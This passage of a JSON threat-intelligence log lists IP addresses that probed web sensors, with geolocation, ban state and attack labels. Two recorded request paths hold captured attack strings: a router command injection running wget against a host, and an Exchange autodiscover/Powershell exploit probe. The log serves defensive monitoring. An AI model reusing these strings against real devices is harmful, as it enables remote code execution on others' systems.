   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:25:00+02:00",
   "last_seen": "2026-10-05T22:25:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [
    "/autodiscover/autodiscover.json?[[[@]]]zdi/Powershell"
   ],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS azpdesyorfgm.stretchoid.com"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "206.189.95.232",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore (Pioneer)",
   "lat": 1.32123,
   "lon": 103.695,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "e81def74b5.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T04:52:00+02:00",
   "last_seen": "2026-10-06T04:52:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS e81def74b5.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "206.81.12.187",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "bf99e5305e.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:44:00+02:00",
   "last_seen": "2026-10-05T20:44:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS bf99e5305e.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06"
   ]
  },
  {
   "ip": "206.81.24.227",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "b59bc1c6ef.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:03:00+02:00",
   "last_seen": "2026-10-05T20:03:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS b59bc1c6ef.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "207.154.197.113",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "bf57ea116e.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T04:52:00+02:00",
   "last_seen": "2026-10-06T04:52:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS bf57ea116e.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "209.38.248.17",
   "country": "Germany",
   "cc": "DE",
   "city": "Ediger-Eller",
   "lat": 50.1167,
   "lon": 7.15,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "c1fe727412.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:36:00+02:00",
   "last_seen": "2026-10-05T20:36:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS c1fe727412.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "212.231.226.20",
   "country": "Spain",
   "cc": "ES",
   "city": "Barcelona",
   "lat": 41.3888,
   "lon": 2.15899,
   "asn": 15704,
   "org": "XTRA TELECOM S.A.",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T23:12:00+02:00",
   "last_seen": "2026-10-05T23:12:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "221.159.119.6",
   "country": "South Korea",
   "cc": "KR",
   "city": "Seongnam-si (Jeongja-dong)",
   "lat": 37.3644,
   "lon": 127.116,
   "asn": 4766,
   "org": "Korea Telecom",
   "ptr": null,
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T02:18:00+02:00",
   "last_seen": "2026-10-06T02:18:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [
    "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0\u2026"
   ],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "23.180.120.153",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8566,
   "lon": 2.35222,
   "asn": 53514,
   "org": "UHQ Services LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:00:00+02:00",
   "last_seen": "2026-10-05T20:00:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "34.156.206.32",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "32.206.156.34.bc.googleusercontent.com",
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T19:47:00+02:00",
   "last_seen": "2026-10-05T19:47:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "34.79.12.228",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "228.12.79.34.bc.googleusercontent.com",
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T18:53:00+02:00",
   "last_seen": "2026-10-05T18:53:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "34.81.90.137",
   "country": "Taiwan",
   "cc": "TW",
   "city": "Taoyuan",
   "lat": 25.0797,
   "lon": 121.234,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "137.90.81.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T23:20:00+02:00",
   "last_seen": "2026-10-05T23:20:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "34.85.106.58",
   "country": "Japan",
   "cc": "JP",
   "city": "Shibuya City",
   "lat": 35.6764,
   "lon": 139.65,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "58.106.85.34.bc.googleusercontent.com",
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T01:23:00+02:00",
   "last_seen": "2026-10-06T01:23:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "35.189.229.134",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "134.229.189.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T19:53:00+02:00",
   "last_seen": "2026-10-05T19:53:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "35.215.59.170",
   "country": "Canada",
   "cc": "CA",
   "city": "Montreal",
   "lat": 45.5019,
   "lon": -73.5674,
   "asn": 43515,
   "org": "Google Ireland Limited",
   "ptr": "170.59.215.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T19:26:00+02:00",
   "last_seen": "2026-10-05T19:26:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "35.217.150.248",
   "country": "Japan",
   "cc": "JP",
   "city": "Osaka",
   "lat": 34.6937,
   "lon": 135.502,
   "asn": 15169,
   "org": "Google LLC",
   "ptr": "248.150.217.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T18:09:00+02:00",
   "last_seen": "2026-10-05T18:09:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "35.240.194.248",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "248.194.240.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T21:25:00+02:00",
   "last_seen": "2026-10-05T21:25:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "4.148.17.77",
   "country": "United States",
   "cc": "US",
   "city": "Phoenix",
   "lat": 33.4483,
   "lon": -112.073,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:24:00+02:00",
   "last_seen": "2026-10-05T22:24:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "40.124.168.91",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:23:00+02:00",
   "last_seen": "2026-10-05T22:23:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "40.124.172.22",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": "azpdsg8sm7ue.stretchoid.com",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:27:00+02:00",
   "last_seen": "2026-10-05T22:27:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS azpdsg8sm7ue.stretchoid.com"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "40.124.186.173",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:28:00+02:00",
   "last_seen": "2026-10-05T22:28:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "cluster:40.124.186.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "medium",
    "evidence": [
     "sent a shell or PHP payload",
     "2 addresses from 40.124.186.0/24 (AS8075) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "40.124.186.184",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T04:45:00+02:00",
   "last_seen": "2026-10-06T04:45:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "cluster:40.124.186.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "medium",
    "evidence": [
     "request carried a known attack-tool user agent",
     "2 addresses from 40.124.186.0/24 (AS8075) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "40.86.204.64",
   "country": "Canada",
   "cc": "CA",
   "city": "Qu\u00e9bec",
   "lat": 46.8131,
   "lon": -71.2075,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:11:00+02:00",
   "last_seen": "2026-10-05T20:11:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "45.138.12.10",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T05:45:00+02:00",
   "last_seen": "2026-10-06T05:45:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "6 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.138.12.51",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T04:04:00+02:00",
   "last_seen": "2026-10-06T04:04:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "6 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "45.138.12.6",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T01:27:00+02:00",
   "last_seen": "2026-10-06T01:27:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "6 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.141.26.3",
   "country": "Thailand",
   "cc": "TH",
   "city": "Bang Rak (Khwaeng Thung Maha Mek)",
   "lat": 13.7255,
   "lon": 100.544,
   "asn": 142299,
   "org": "CLOUDFOREST CO.,LTD",
   "ptr": "45-141-26-3.static.cloudforest.co.th",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:01:00+02:00",
   "last_seen": "2026-10-05T22:01:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "45.153.102.164",
   "country": "Ireland",
   "cc": "IE",
   "city": "Bagenalstown",
   "lat": 52.7007,
   "lon": -6.95706,
   "asn": 203020,
   "org": "HostRoyale Technologies Pvt Ltd",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T04:57:00+02:00",
   "last_seen": "2026-10-06T04:57:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "45.156.87.131",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 197170,
   "org": "TechTies Inc.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T04:39:00+02:00",
   "last_seen": "2026-10-06T04:39:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.195.231.146",
   "country": "Turkey",
   "cc": "TR",
   "city": "Ankara",
   "lat": 39.9334,
   "lon": 32.8597,
   "asn": 214941,
   "org": "UPCELL TELEKOMUNIKASYON LIMITED SIRKETI",
   "ptr": "static.onlinehosting.com.tr",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T21:27:00+02:00",
   "last_seen": "2026-10-05T21:27:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "45.43.60.98",
   "country": "Japan",
   "cc": "JP",
   "city": "Shibuya City",
   "lat": 35.6764,
   "lon": 139.65,
   "asn": 135377,
   "org": "UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED",
   "ptr": "paifrtoyibbdx.com",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:15:00+02:00",
   "last_seen": "2026-10-05T20:15:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "52.165.83.218",
   "country": "United States",
   "cc": "US",
   "city": "Des Moines",
   "lat": 41.5868,
   "lon": -93.625,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:23:00+02:00",
   "last_seen": "2026-10-05T22:23:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "64.225.75.246",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3563,
   "lon": 4.95714,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "b32f2b056d.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:44:00+02:00",
   "last_seen": "2026-10-05T20:44:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS b32f2b056d.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "64.226.65.160",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "a46db02ec6.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:38:00+02:00",
   "last_seen": "2026-10-05T22:38:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS a46db02ec6.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "64.227.32.66",
   "country": "United Kingdom",
   "cc": "GB",
   "city": "Slough",
   "lat": 51.5222,
   "lon": -0.62916,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "d103188940.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T04:24:00+02:00",
   "last_seen": "2026-10-06T04:24:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS d103188940.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "65.49.1.94",
   "country": "United States",
   "cc": "US",
   "city": "Pleasanton",
   "lat": 37.6951,
   "lon": -121.9,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-58a.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T02:54:00+02:00",
   "last_seen": "2026-10-06T02:54:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "firehol-level1",
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-58a.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "73.53.43.220",
   "country": "United States",
   "cc": "US",
   "city": "Everett",
   "lat": 47.979,
   "lon": -122.202,
   "asn": 7922,
   "org": "Comcast Cable Communications, LLC",
   "ptr": "c-73-53-43-220.hsd1.wa.comcast.net",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T00:10:00+02:00",
   "last_seen": "2026-10-06T00:10:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
